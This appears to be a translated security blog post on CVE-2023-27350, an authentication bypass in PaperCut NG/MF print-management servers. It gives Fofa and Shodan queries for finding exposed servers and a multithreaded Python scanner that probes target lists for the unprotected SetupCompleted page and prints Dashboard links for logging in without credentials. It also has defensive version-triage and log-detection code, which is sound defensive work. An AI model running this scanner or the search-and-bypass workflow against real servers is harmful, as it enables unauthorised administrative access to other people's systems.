The articles and tools published by this account are for exchange and learning only; this account accepts no liability. If any content infringes your rights, please notify us and we will delete it immediately.
This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (build 63914). Authentication is not required to exploit it. The specific flaw exists within the SetupCompleted class and results from improper access control: a setup page that should only be reachable during initial installation remains accessible afterwards. An attacker can leverage this to bypass authentication and go on to execute arbitrary code in the SYSTEM context. Published: 04/20/2023
Base Score: 9.8 CRITICAL
https://nvd.nist.gov/vuln/detail/CVE-2023-27350
Chinese official site:
https://www.papercut.com/zh-cn/ng/
DIY print management solution for everyone
Trial version:
https://www.papercut.com/products/ng/download/
Affected: PaperCut NG and PaperCut MF version 8.0 or later, on all operating system platforms. Patched versions: 20.1.7, 21.2.11 and 22.0.9 and later.
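The version ranges above are easy to misread when triaging scan output by hand, because each maintained branch has its own first fixed build. The following is an added example, not code from the original article or from PaperCut, that turns the advisory summary into a branch-aware check. It assumes the summary is exhaustive: builds before 8.0 are not affected, 8.x through 19.x are affected with no fix on those branches, 20.x/21.x/22.x are fixed from 20.1.7/21.2.11/22.0.9 respectively, and "and later" also covers any newer major version (an interpretation, not something the page states explicitly).

```python
# Added example (not from the original article or from PaperCut): classify a
# PaperCut NG/MF version string against the CVE-2023-27350 fixed versions.
import re
from typing import Optional, Tuple

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)$")

# First fixed build on each maintained branch, from the advisory summary.
FIXED_BY_BRANCH = {
    20: (20, 1, 7),
    21: (21, 2, 11),
    22: (22, 0, 9),
}
# Advisory lists 8.0 or later as affected; assumption: anything older is out of scope.
FIRST_AFFECTED = (8, 0, 0)


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Return (major, minor, patch) for strings such as '22.0.5', else None."""
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_vulnerable(version: str) -> Optional[bool]:
    """True if the version is in the affected range and below its branch fix,
    False if patched or never affected, None if the string is not a version."""
    v = parse_version(version)
    if v is None:
        return None
    if v < FIRST_AFFECTED:
        return False                      # pre-8.0: not listed as affected
    major = v[0]
    if major in FIXED_BY_BRANCH:
        return v < FIXED_BY_BRANCH[major]  # tuple comparison is lexicographic
    if major > max(FIXED_BY_BRANCH):
        return False                      # assumption: newer majors ship after the fix
    return True                           # 8.x .. 19.x: affected, no fix on branch


def triage(versions):
    """Map each reported version string to its vulnerability verdict."""
    return {v: is_vulnerable(v) for v in versions}


if __name__ == "__main__":
    # Constructed sample input: version strings as the SetupCompleted page prints them.
    for ver, verdict in triage(["22.0.5", "22.0.9", "21.2.10", "19.2.1", "7.9.0", "n/a"]).items():
        print(f"{ver:>8} -> {verdict}")
```

Feed the version strings collected by the scanner below into `triage()` to separate hosts that still need patching from those that merely expose a version banner.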
Asset search syntax:
# Fofa
title="papercut"
# Shodan
http.html:"papercut"
from queue import Queue
import re
from threading import Thread
from bs4 import BeautifulSoup
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Setup page that should only be reachable during initial installation; on a
# vulnerable build it is served without a session and prints the product version
SETUP_PATH = '/app?service=page/SetupCompleted'
# Admin page that becomes reachable once SetupCompleted has been visited
DASHBOARD_PATH = '/app?service=page/Dashboard'

headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'
}

def write_Result(url):
    # append a hit to result.txt
    with open("result.txt", "a", encoding="utf-8") as f:
        f.write(url + "\n")

def ReadFile(fQueue: Queue):
    # targets are read from text.txt, one base URL per line (static path for now)
    with open(r"text.txt", 'r', encoding='utf-8') as file:
        for line in file:
            target = line.strip().rstrip('/')
            if target:
                fQueue.put(target)

class A(Thread):
    def __init__(self, url):
        super(A, self).__init__()
        self.url = url
        self.daemon = True

    def run(self) -> None:
        setup_url = self.url + SETUP_PATH
        try:
            response = requests.get(url=setup_url, headers=headers, verify=False, timeout=10)
            # print("URL:{} STATUS:{}".format(response.url, response.status_code))
            if response.status_code != 200:
                return
            # a 200 on the setup page is recorded even before the version is confirmed
            write_Result(setup_url)
            soup = BeautifulSoup(response.text, 'html.parser')
            text_div = soup.find('div', class_='text')
            if text_div is None:
                print('Not Vulnerable:', self.url)
                return
            version_span = None
            for span in text_div.find_all('span'):
                # the setup page prints the product version as e.g. 22.0.5
                if re.match(r'^\d+\.\d+\.\d+$', span.text.strip()):
                    version_span = span
                    break
            if version_span is None:
                print('Not Vulnerable:', self.url)
                return
            version_str = version_span.text.strip()
            print('Version:', version_str)
            print('HTTP Status Code:', response.status_code)
            print(f"1) Visit this URL > {setup_url}")
            write_Result(setup_url + '\n' + self.url + DASHBOARD_PATH)
            print(f"2) Login Authentication Bypass > {self.url}{DASHBOARD_PATH}")
        except Exception as e:
            print(f"Error {self.url}: {e}")

q = Queue()
ReadFile(q)
threads = []
while not q.empty():
    t = A(q.get())
    t.start()
    threads.append(t)
# daemon threads are killed when the main thread exits, so wait for them
for t in threads:
    t.join()
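The scanner's two-step output (visit SetupCompleted, then open Dashboard) is also the sequence a defender can look for. The following is an added example, not code from the original article or from PaperCut, that flags this sequence per client in combined-format access logs. It assumes the logs come from a reverse proxy or web server in front of the PaperCut web UI (PaperCut's own log format is not used here); the sample log lines are constructed.

```python
# Added example (not from the original article or from PaperCut): detect the
# SetupCompleted -> Dashboard request sequence in combined-format access logs.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: combined log format as written by a reverse proxy in front of PaperCut
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
SETUP_PATH = "/app?service=page/SetupCompleted"
DASHBOARD_PATH = "/app?service=page/Dashboard"


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def setup_hits(lines):
    """Count 200 responses on the SetupCompleted page per client IP. On a server
    whose setup finished long ago, any such hit deserves a look on its own."""
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == SETUP_PATH and rec[3] == 200:
            counts[rec[0]] += 1
    return dict(counts)


def detect_bypass(lines, window=timedelta(minutes=5)):
    """Return (ip, setup_ts, dashboard_ts) for every client that got a 200 on
    SetupCompleted and then a 200 on Dashboard within `window`."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            ip, ts, path, status = rec
            events[ip].append((ts, path, status))
    alerts = []
    for ip, recs in events.items():
        recs.sort()                      # chronological order per client
        for i, (ts, path, status) in enumerate(recs):
            if path != SETUP_PATH or status != 200:
                continue
            for ts2, path2, status2 in recs[i + 1:]:
                if ts2 - ts > window:    # later requests are outside the window
                    break
                if path2 == DASHBOARD_PATH and status2 == 200:
                    alerts.append((ip, ts, ts2))
                    break
    return alerts


# Constructed sample log: one real bypass, one normal admin login redirect,
# and one SetupCompleted hit whose Dashboard request falls outside the window.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Apr/2023:10:15:01 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 5120 "-" "python-requests/2.28.1"',
    '203.0.113.7 - - [20/Apr/2023:10:15:03 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 9876 "-" "python-requests/2.28.1"',
    '198.51.100.4 - - [20/Apr/2023:10:16:00 +0000] "GET /app HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/Apr/2023:10:16:10 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [20/Apr/2023:11:00:00 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 5120 "-" "curl/7.88"',
    '192.0.2.9 - - [20/Apr/2023:11:30:00 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 9876 "-" "curl/7.88"',
]

if __name__ == "__main__":
    print("SetupCompleted hits per IP:", setup_hits(SAMPLE_LOG))
    for ip, t1, t2 in detect_bypass(SAMPLE_LOG):
        print(f"bypass sequence from {ip}: setup at {t1}, dashboard at {t2}")
```

`setup_hits()` is the low-noise signal: after installation, nobody should get a 200 from SetupCompleted at all. `detect_bypass()` adds the follow-up Dashboard request to separate a scanner probe from an attacker who actually used the unauthenticated session.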
https://mp.weixin.qq.com/s/UKaECN9PYR93ORis7l-XXw